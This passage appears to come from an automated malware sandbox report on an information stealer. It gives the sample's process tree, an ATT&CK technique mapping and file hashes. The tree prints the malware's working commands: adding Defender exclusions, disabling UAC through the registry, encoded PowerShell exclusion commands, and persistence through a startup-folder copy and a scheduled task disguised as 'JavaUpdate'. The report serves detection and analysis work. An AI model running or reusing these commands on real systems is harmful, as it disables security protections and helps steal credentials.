- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Users\Admin\Documents\SecurityHealthSystray.exe
"C:\Users\Admin\Documents\SecurityHealthSystray.exe"
4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension .exe;Add-MpPreference -ExclusionPath "C:\ " "
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Modifies registry key
PID:1248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c Copy "C:\Users\Admin\Documents\SecurityHealthSystray.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SecurityHealthSystray.exe"
5⤵
PID:2944

C:\Users\Admin\Documents\SecurityHealthSystray.exe
"C:\Users\Admin\Documents\SecurityHealthSystray.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:2492

C:\Users\Admin\Documents\SecurityHealthSystray.exe
-a "C:\Users\Admin\AppData\Local\0b656437\plg\de8gxdjj.json"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2460

C:\Users\Admin\Documents\SecurityHealthSystray.exe
-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
PID:3744

C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
"C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3636

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "JavaUpdate" /tr "C:\Users\Admin\JavaUpdate.exe"
4⤵
- Creates scheduled task(s)
PID:2940

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\JavaUpdate.exe"
3⤵
PID:3440

C:\Users\Admin\JavaUpdate.exe
C:\Users\Admin\JavaUpdate.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3272

C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
5⤵
PID:2520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
6⤵
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
6⤵
PID:3276

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
5⤵
- Executes dropped EXE
PID:3524

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "tpfijyehtrsawy"
6⤵
PID:1368

C:\Windows\explorer.exe
C:\Windows\explorer.exe bdrrwwdwgydz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJS6kTcb2sZJ49Q3iSMDc1H0/qJixxsRFFHuJTRy3GDygkOjVFfVGxiAqnI6VEOc7K3GIpMARLTx8uWvB5r0QCuVxF7mJwq0yZvWtCbqmRbkmZuVZDNS8Z8qSNYFAB9Ezc/UmTMFmIx0AcwGvE4K2P6YLmUzmziU4T47mA6dtccAW3XzwDMQxG3WY1abSgyiNJtkV3dlzQD8J0HdSeITY8LegOxuzUGfCrbTgW9u2VAa7RVnzGoVoJX5bAxBGFalnm/oKnCPIJNkilErgYiQQFePCwbkbNxG9rLOt6BtVbQgZBbjI5+yoXZmTbNVwOoWnVQv9j2OJzMj/D/CCiMS0rucIeLPm5I2quqcTpryb4Vo9+HlPPT2RVsQg2Xx+WtKtCi8H/3R5BYre5iEkJhwqGDEqCiiGtJieTvFYa9LUaN0GOPvVEjCOtoaFltF2Dl/LzjMvLW/HdsZ7p1g5iLOSFzNYYO0TSq337RuFN/21X4vXRdrTXVIZAV2pzmMvGm/mAXuTYURLG4/sTS+HgpY3h1vYVNDWRRucFqvAl0w1LLKcAWDLFSxqixrMrCOUmTYbwmRC8KXPC1aeKdbX+yKxS46zWpYMQphF9mQKcqTsdSuuFy2jl4gEKWMYvC9YHX/UpcJHvIVF1vqi+kmtHvlREfvW6e3OvaXPk1eYm/Cc7rzBH1d/h/DdjyNA9bm+TU3tMjgBJePNGq8iAAVZl1hcEw7o+8XruAZgDJmryPftljgzTigQn4Dwu7XVjedQ9m2d+53BK4EIPVTP/BrxDAeVnlPaFj0vOd4MKQBRCp1vQkS2rxJ2oZ1ReX7opWcR7IW0/881l1T2vhOLfv8cJYpxfZxntVgZ0BVT/Pz884jBLcwpURpAF49IvgqsraaeH6gMOYNMj0Vinsljf7crKght1+dZrNK2+n+PAR2+vYw1Tm3FCM/MgTfuMmVTYkx7NqQjc4JVg1CfCt/cmfGJ71HMoO8Yh3d+uL/0CiDG78z/lQMCEbQ2HJ/U3i3cfcEuPH47qexLrtaDROcVLECp2OLSzXAPjwXFpSD8nMxp72KkGCh3xVV9Q2Lp4AnHE04Vdf+FAko1nf+CD5lD5F9rpUG/xRkY4XNYkOXnBldKVr5ZP+gvfxfgviei2LjaSL0wvgyXGRxQxCFScX+1Y2HUYnN3+hDX9hr02AQWcIZU9XbKNMKlvBvzjyBMIW5Pc23HSIDwphk8oxRYvro45WSrpvb5fA1lbKSXTIiARjSpzkJdFJCkj5w1giikZ4nujLybev0AUFFJs5cWBjNx9qWhN6m05vTZhZJCEwTtMjVRG3zZLIZcuvZiewRKSwMJUMPJsTk2XX7KR7R5pGTxIxsPXQgjnXf1SGF5nHMA5Ay284VN0r5D1jq23i47QIufpQcXxPF9S2WKPsPR0DuSyUHcr8G3Mhq6X79f6wngKrI/3kgXc84uzWstvC6aO4EaZRoKKnPgSuygiJie668FEi5z3RkwiENc2BxP7xqAPAD6AACNpbp6CuVxYeQEy/A/A+Z9XPqfQNdjT42VuX1tsXHy1IeMiZ8VwFn1MryYuuqpy6boHwhOtcfyL5L/ZAlRd3PKBgAJYJiWzUTMU8QWyMU5wGy0kcl0Kn0SHPojjHvh4tJxevM+w==
5⤵
PID:1308

C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\0b656437\plg\de8gxdjj.json
MD5
77e6621fd939338d3f19f3dd948ecf43

SHA1
53df8b3a76c5d6c35a99aa7759ff3bd7ec46588c

SHA256
9cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867

SHA512
6e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JavaUpdate.exe.log
MD5
ccab855674fc209084a77e39bb2d0e4a

SHA1
b650dd0c67a9af9944ea8379104e2d3ad7cfdd83

SHA256
a105106a58b72abea9c6c73700c88c95aff096b6eda3d9fd396bbd9db67f8be7

SHA512
b79a21f8aeaf948fa4665c90a85a1edc754666e7ebfb15255e58bc6ab827a36c93f11822105e42a3565e797dd318ccc97f8f0671508480955440eff8ed5e7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
eceef4687529226fc4ca1c1fde30247e

SHA1
90a9ad40557c25bb89d06cb18eecb87170610498

SHA256
012d5123a94eaa1f6a2db419757e31a2bc7970461a8e84e76e9c3aef30fc731b

SHA512
3a4262603edfc42aeb62af22b7b6052f75765f0e30ceb4d83f6f2b70b89c3d04d3925bd76d17c241a349ec28da68c97734e067f6f5a0c698056b6db59831b044

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
eceef4687529226fc4ca1c1fde30247e

SHA1
90a9ad40557c25bb89d06cb18eecb87170610498

SHA256
012d5123a94eaa1f6a2db419757e31a2bc7970461a8e84e76e9c3aef30fc731b

SHA512
3a4262603edfc42aeb62af22b7b6052f75765f0e30ceb4d83f6f2b70b89c3d04d3925bd76d17c241a349ec28da68c97734e067f6f5a0c698056b6db59831b044

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
eceef4687529226fc4ca1c1fde30247e

SHA1
90a9ad40557c25bb89d06cb18eecb87170610498

SHA256
012d5123a94eaa1f6a2db419757e31a2bc7970461a8e84e76e9c3aef30fc731b

SHA512
3a4262603edfc42aeb62af22b7b6052f75765f0e30ceb4d83f6f2b70b89c3d04d3925bd76d17c241a349ec28da68c97734e067f6f5a0c698056b6db59831b044

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
14c034c14a3236af8cdb2ec7e0541b45

SHA1
7b1da3472ca6194516c461259ed6a729d531f1ee

SHA256
7df0ad88e3190f1406da16f08d991f1908754d8eaab04431c865d03278acd1c5

SHA512
87c2fd3c167ba4e25a3c20c0c52af7513326d411c969443dfabe2e8b9d3bd557a16bd882394469cade25b5d5ae26911c8320bffeb050f671f2faabb715ab7c13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
14c034c14a3236af8cdb2ec7e0541b45

SHA1
7b1da3472ca6194516c461259ed6a729d531f1ee

SHA256
7df0ad88e3190f1406da16f08d991f1908754d8eaab04431c865d03278acd1c5

SHA512
87c2fd3c167ba4e25a3c20c0c52af7513326d411c969443dfabe2e8b9d3bd557a16bd882394469cade25b5d5ae26911c8320bffeb050f671f2faabb715ab7c13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
33298753c514ca5bb18434f23bf44a9e

SHA1
debc101f1c9c3bccb5517de553a9341b499ca06b

SHA256
34a8b695fac748215054c68751e2aa761618f96dc9957a2fc96f6e967d5afce5

SHA512
14cabf5917796f0981c472796fb112f04f2b65ed58448323f842c2367f1c120142045a6b9a986b507a10bca7e6055f3c75533257ebfc1cf0e7d4cf89c5eec2b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4afc32a758b1ed3448b06552aa37dd6c

SHA1
a9f85e1962d17f14cbd181aad423505af0ec54de

SHA256
c5706b0908c2d656f02f5395cb925807d5e2412230390cd106a40b729ea9f226

SHA512
0bbb71df5c28eeb795cfbc80e85677c176ca4b998e7cceeb233976786c58fec84aee6f7bcf356dcaaa5fba9a779a559f69fa998f5aec19b303e936b38ca8e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8f734fc80366b34a1805f06a02a5613a

SHA1
fdfad008f6e9ec6e469109e39f90e7dabb47f4da

SHA256
738b10ed98eeda57e7c7bfdded75c1ea85a147597828a2979a6b6263a3f6a6dc

SHA512
353f40839a01c10c93a8c87ba9f8eda9b57b5e1bc0fdf4ab5f7fdc1abb4a007c90cad8ec689fb1312e4974291b9096bab88a3ad3ed0fa1e6b7251b421a9be610

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe
MD5
a29afa716d32438781d7bd9f490f2d82

SHA1
ee28162c74520655e1e92bcaf7a2cab81547234b

SHA256
9e0420e8eb290152971194d8283b5161dd02a9b3c3f876edcb75ea5c8253191f

SHA512
e1e819052b9e14c5a5ea896215ea95d1b1b6971876f6aa6602bc48cb61c7d61ad8517fd53ca71d7eff5c9257ee0213f21d5561c3058f2298cc2b0d7ad15ae6f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installer.exe
MD5
a29afa716d32438781d7bd9f490f2d82

SHA1
ee28162c74520655e1e92bcaf7a2cab81547234b

SHA256
9e0420e8eb290152971194d8283b5161dd02a9b3c3f876edcb75ea5c8253191f

SHA512
e1e819052b9e14c5a5ea896215ea95d1b1b6971876f6aa6602bc48cb61c7d61ad8517fd53ca71d7eff5c9257ee0213f21d5561c3058f2298cc2b0d7ad15ae6f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Khgstquy.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
MD5
856ad5c82117630907fc0c3fb75e5696

SHA1
9890b478440afc80ef4c029d37a8d0e016c9cd82

SHA256
d73371bf6af5a0962765e506bed7bd04cf0fa949fe0bd323c76900010d2337c0

SHA512
9db4604ac7ee2f6453bc099e75734b911f02e6af653c4c5d31a6ffddf353227632dd929360f9b7c5cccd07dce898382ff328494712a512b2cf088b269df97fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ujnlfschrqsf.exe
MD5
856ad5c82117630907fc0c3fb75e5696

SHA1
9890b478440afc80ef4c029d37a8d0e016c9cd82

SHA256
d73371bf6af5a0962765e506bed7bd04cf0fa949fe0bd323c76900010d2337c0

SHA512
9db4604ac7ee2f6453bc099e75734b911f02e6af653c4c5d31a6ffddf353227632dd929360f9b7c5cccd07dce898382ff328494712a512b2cf088b269df97fdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\unk.xml
MD5
77e6621fd939338d3f19f3dd948ecf43

SHA1
53df8b3a76c5d6c35a99aa7759ff3bd7ec46588c

SHA256
9cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867

SHA512
6e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\SecureData\smss.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
839bdfa9e45662b4cfce43dbceb5f88b

SHA1
bb275f39188b48877de04d91b4c265c39cf41110

SHA256
0f605389ccc26a71805a47724a20cdedef03becb8222fe1f804d36492fa0e45b

SHA512
32c0afac6249eb9619e3467f8812c3c27141bb46caf97692150bfa3471060e7175d6fef3977215623f191704635fc815bbfdb4f46923494ae7f995da19726954

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
MD5
839bdfa9e45662b4cfce43dbceb5f88b

SHA1
bb275f39188b48877de04d91b4c265c39cf41110

SHA256
0f605389ccc26a71805a47724a20cdedef03becb8222fe1f804d36492fa0e45b

SHA512
32c0afac6249eb9619e3467f8812c3c27141bb46caf97692150bfa3471060e7175d6fef3977215623f191704635fc815bbfdb4f46923494ae7f995da19726954

Download Submit
C:\Users\Admin\AppData\Roaming\Remove.bat
MD5
ad29a839c20a29353411e3c81c2c9c02

SHA1
e9fbf4df7868f2bbd99e14d4fe0ac2dbc88ecb63

SHA256
21f6a53f02f45424018afe7d87e7af4a2006a61558de6fba42c4a7514de893e8

SHA512
4a930193e057f74ca70d06814824617451ddb3243a771235a1944b0e921aaabe2852bfe9ae0575942e91ce9435bf7aee2e1c03b89157cf431b2f1fd030b54fbf

Download Submit
C:\Users\Admin\Documents\JavaSheduler.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\Documents\JavaSheduler.exe
MD5
541ebd27434e01ef36fb17fbb197565b

SHA1
3313d0e2bff470b4c2c6200a881ffd75054d5763

SHA256
58bf6d4db80009df3b5f9967d54575f459087100498eab59a7b13f5aa44d1e6d

SHA512
5f6e08a24a77c45cda674cad771293ede99dd4d62011e3d171579c09483c065484d0705532b6610561474e4c9e0c85d9d1456064bc958392630a53e0fea57b02

Download Submit
C:\Users\Admin\Documents\JavaUpdaters.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\Documents\JavaUpdaters.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\Documents\License.XenArmor
MD5
4f3bde9212e17ef18226866d6ac739b6

SHA1
732733bec8314beb81437e60876ffa75e72ae6cd

SHA256
212173a405c78d70f90e8ec0699a60ed2f4a9f3a8070de62eabd666c268fb174

SHA512
10b7cdae0b9a7b0f8e1bfc66a60675fa9b25c523864d5ae3da243f4e6e4c5194f3bd92af57ac956157442f66414bdd3393d0a1e5ba4ef0f192561e8524d4e744

Download Submit
C:\Users\Admin\Documents\License.XenArmor
MD5
bf5da170f7c9a8eae88d1cb1a191ff80

SHA1
dd1b991a1b03587a5d1edc94e919a2070e325610

SHA256
e5d5110feb21939d82d962981aeaaafc4643b40a9b87cbed800ace82135d57cd

SHA512
9e32247d8556fd6efffbf7b6b9c325652d8c4b223b0fa38020879171476a49ab1f64d8897b5d8d92b79c5484fd9d5899be26ca5f664ee1f9c2acb0857084121e

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\SecurityHealthSystray.exe
MD5
b5a450cd4f12a397920ef54974eacb3e

SHA1
8bbcd3c68255a996a91782c64250d13155dc04d0

SHA256
61665565d9238f8bdc6c73d97d4b92d3a97b6544c8512ba3f5531ccce232cb3d

SHA512
947ba67d3251aba352a4fb5c4b90e6e0b28459940bd4003c9e004b6b2b05a19dec56c97c66565b1fd084c70aa191ef538c4a3dffaff35a73b66e671b403964cc

Download Submit
C:\Users\Admin\Documents\Unknown.dll
MD5
86114faba7e1ec4a667d2bcb2e23f024

SHA1
670df6e1ba1dc6bece046e8b2e573dd36748245e

SHA256
568da887725ccfdc4c5aae3ff66792fe60eca4e0818338f6a8434be66a6fe46d

SHA512
d26ee0da6ccd4022982cf848c46e40f6781b667e39d0c5daf5ea8d74c44e55c55a5f7590a4d2a60aa1911358ca783c4276a9b4e6311c4cea20df1ebd4f7f457f

Download Submit
C:\Users\Admin\Documents\redlineTacNine.exe
MD5
80099430fb50d4c31c7ce28e2cb0fef5

SHA1
1fbaa22a5d6c76ee2d6645ec922fc449ade78581

SHA256
0da9fd34d122db7737e8748fd3ca6b2f7a9606e52bb0168efc3c64cf2e2c4d44

SHA512
d1a928631c35df015c58806b754191877c18951594a5d1d7808fd0ac024f1cceb8413515c609374075e797a487f4f995542c1d641bf1fd661bcac654f3cfecc5

Download Submit
C:\Users\Admin\Documents\redlineTacNine.exe
MD5
80099430fb50d4c31c7ce28e2cb0fef5

SHA1
1fbaa22a5d6c76ee2d6645ec922fc449ade78581

SHA256
0da9fd34d122db7737e8748fd3ca6b2f7a9606e52bb0168efc3c64cf2e2c4d44

SHA512
d1a928631c35df015c58806b754191877c18951594a5d1d7808fd0ac024f1cceb8413515c609374075e797a487f4f995542c1d641bf1fd661bcac654f3cfecc5

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
e2942c6f82ffcd63138ed9cfb09fc003e2794a6b5984b718c671cad7abf61ac8

SHA512
87a843f257d10d9515b516fae8e84b315f6ecac466db011686c69cf7c2085c823395f1eff9b82c6c74dd6c7986621e20308e9a618e30f6ba319f4951511b88d2

Download Submit
C:\Users\Admin\JavaUpdate.exe
MD5
6f505741448ebc374a89cdd60b6ef8a7

SHA1
6b3e4cbd3c2ddd8cf3cd3f746454fff67373cf5c

SHA256
